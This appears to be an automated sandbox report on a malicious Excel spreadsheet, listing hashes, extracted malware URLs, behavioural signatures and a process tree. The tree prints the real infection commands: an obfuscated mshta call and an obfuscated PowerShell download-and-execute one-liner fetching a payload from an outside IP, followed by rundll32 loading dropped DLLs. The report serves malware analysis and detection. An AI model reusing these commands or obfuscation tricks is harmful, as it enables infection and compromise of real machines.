Analysis
max time kernel: 127s
max time network: 173s
platform: windows10_x64
resource: win10-en-20211208
submitted: 17-01-2022 22:11
Behavioral task
behavioral1
Sample
9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls
Resource
win10-en-20211208
Behavioral task
behavioral2
Sample
9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls
Resource
win10-en-20211208
General
Target: 9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls
Size: 65KB
MD5: d13888aa7ccb2000c133b0ca9a1bd653
SHA1: a9e3e296c1b75aaee53f93f96d603107a9a6874c
SHA256: 9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce
SHA512: 209487538b7314b8f0051ced9bd8850c7dcb3f0e5302722fe799a725e067202959484d72613d1c307b2daba7c1db5ccab6cb781b23808ae92f116b0cc70981bd
Malware Config
Extracted: http://0xc12a24f5/cc.html
Extracted: http://193.42.36.245/PP91.PNG
Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
- Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1368 | 3100 | cmd.exe | EXCEL.EXE
Blocklisted process makes network request 7 IoCs
Processes (flow | pid | process):
- 32 | 3632 | mshta.exe
- 36 | 2288 | powershell.exe
- 38 | 2288 | powershell.exe
- 46 | 3216 | rundll32.exe
- 47 | 3216 | rundll32.exe
- 48 | 3216 | rundll32.exe
- 51 | 3216 | rundll32.exe
Downloads MZ/PE file

Loads dropped DLL 2 IoCs
Processes (pid | process):
- 1076 | rundll32.exe
- 2464 | rundll32.exe
Drops file in System32 directory 1 IoCs
Processes (description | ioc | process):
- File opened for modification | C:\Windows\SysWOW64\Petwvvgrt\kbus.wbp | rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 1 IoCs
Processes (pid | pid_target | process | target process):
- 632 | 3632 | WerFault.exe | mshta.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes (description | ioc | process):
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes (pid | process):
- 1484 | ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes (pid | process):
- 3100 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes (pid | process):
- 632 | WerFault.exe (14 entries)
- 2288 | powershell.exe (3 entries)
- 3216 | rundll32.exe (4 entries)
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description | pid | process):
- Token: SeDebugPrivilege | 632 | WerFault.exe
- Token: SeDebugPrivilege | 2288 | powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs
Processes (pid | process):
- 3100 | EXCEL.EXE (2 entries)

Suspicious use of SetWindowsHookEx 13 IoCs
Processes (pid | process):
- 3100 | EXCEL.EXE (13 entries)
Suspicious use of WriteProcessMemory 26 IoCs
Processes (description | pid | process | target process):
- PID 3100 wrote to memory of 1368 | 3100 | EXCEL.EXE | cmd.exe (2 entries)
- PID 1368 wrote to memory of 3632 | 1368 | cmd.exe | mshta.exe (2 entries)
- PID 3632 wrote to memory of 2288 | 3632 | mshta.exe | powershell.exe (2 entries)
- PID 2288 wrote to memory of 1848 | 2288 | powershell.exe | cmd.exe (2 entries)
- PID 1848 wrote to memory of 1076 | 1848 | cmd.exe | rundll32.exe (3 entries)
- PID 1076 wrote to memory of 2464 | 1076 | rundll32.exe | rundll32.exe (3 entries)
- PID 2464 wrote to memory of 1708 | 2464 | rundll32.exe | rundll32.exe (3 entries)
- PID 1708 wrote to memory of 3216 | 1708 | rundll32.exe | rundll32.exe (3 entries)
- PID 3216 wrote to memory of 1228 | 3216 | rundll32.exe | systeminfo.exe (3 entries)
- PID 3216 wrote to memory of 1484 | 3216 | rundll32.exe | ipconfig.exe (3 entries)
Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 3100

C:\Windows\SYSTEM32\cmd.exe (depth 2)
Command line: cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID: 1368

C:\Windows\system32\mshta.exe (depth 3)
Command line: mshta http://0xc12a24f5/cc.html
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID: 3632

C:\Windows\system32\WerFault.exe (depth 4)
Command line: C:\Windows\system32\WerFault.exe -u -p 3632 -s 1636
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://193.42.36.245/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2288

C:\Windows\system32\cmd.exe (depth 5)
Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
- Suspicious use of WriteProcessMemory
PID: 1848

C:\Windows\SysWow64\rundll32.exe (depth 6)
Command line: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID: 1076

C:\Windows\SysWOW64\rundll32.exe (depth 7)
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID: 2464

C:\Windows\SysWOW64\rundll32.exe (depth 8)
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Petwvvgrt\kbus.wbp",XTdhK
- Suspicious use of WriteProcessMemory
PID: 1708

C:\Windows\SysWOW64\rundll32.exe (depth 9)
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Petwvvgrt\kbus.wbp",DllRegisterServer
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID: 3216

C:\Windows\SysWOW64\systeminfo.exe (depth 10)
Command line: systeminfo
- Gathers system information
PID: 1228

C:\Windows\SysWOW64\ipconfig.exe (depth 10)
Command line: ipconfig /all
- Gathers network information
PID: 1484
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Public\Documents\ssd.dll (listed three times, also under the path \Users\Public\Documents\ssd.dll, with identical hashes)
MD5: 94ece97a39d07d3264de94ed36f1fb62
SHA1: 6051bc605470b2ac80ea1b9acf9e60431e783a8f
SHA256: c0c691b55a0b4b8fdd13ec7b4ee8a4b045c5d56b2518d06175ad683679a0198f
SHA512: 3943fdbec69de1bc5850d205441687e009921eb395b08552943ede27d47933c55d588f5ab49ea93e3161b580cd74c21674ce0abe848ef20370422e6cee17d80d

Memory dumps:
- memory/1076-321-0x0000000000000000-mapping.dmp
- memory/1228-354-0x0000000000000000-mapping.dmp
- memory/1368-256-0x0000000000000000-mapping.dmp
- memory/1484-356-0x0000000000000000-mapping.dmp
- memory/1708-338-0x0000000000000000-mapping.dmp
- memory/1848-320-0x0000000000000000-mapping.dmp
- memory/2288-315-0x000002679E736000-0x000002679E738000-memory.dmp (Filesize 8KB)
- memory/2288-273-0x0000000000000000-mapping.dmp
- memory/2288-278-0x000002679E730000-0x000002679E732000-memory.dmp (Filesize 8KB)
- memory/2288-279-0x000002679E733000-0x000002679E735000-memory.dmp (Filesize 8KB)
- memory/2288-280-0x000002679E770000-0x000002679E792000-memory.dmp (Filesize 136KB)
- memory/2288-299-0x000002679ED50000-0x000002679ED8C000-memory.dmp (Filesize 240KB)
- memory/2288-310-0x000002679EE10000-0x000002679EE86000-memory.dmp (Filesize 472KB)
- memory/2464-326-0x0000000000000000-mapping.dmp
- memory/3100-125-0x0000016664EC0000-0x0000016664EC2000-memory.dmp (Filesize 8KB)
- memory/3100-124-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp (Filesize 64KB)
- memory/3100-122-0x0000016664EC0000-0x0000016664EC2000-memory.dmp (Filesize 8KB)
- memory/3100-118-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp (Filesize 64KB)
- memory/3100-123-0x0000016664EC0000-0x0000016664EC2000-memory.dmp (Filesize 8KB)
- memory/3100-121-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp (Filesize 64KB)
- memory/3100-120-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp (Filesize 64KB)
- memory/3100-119-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmp (Filesize 64KB)
- memory/3216-343-0x0000000000000000-mapping.dmp
- memory/3216-355-0x0000000005320000-0x0000000005338000-memory.dmp (Filesize 96KB)
- memory/3632-257-0x0000000000000000-mapping.dmp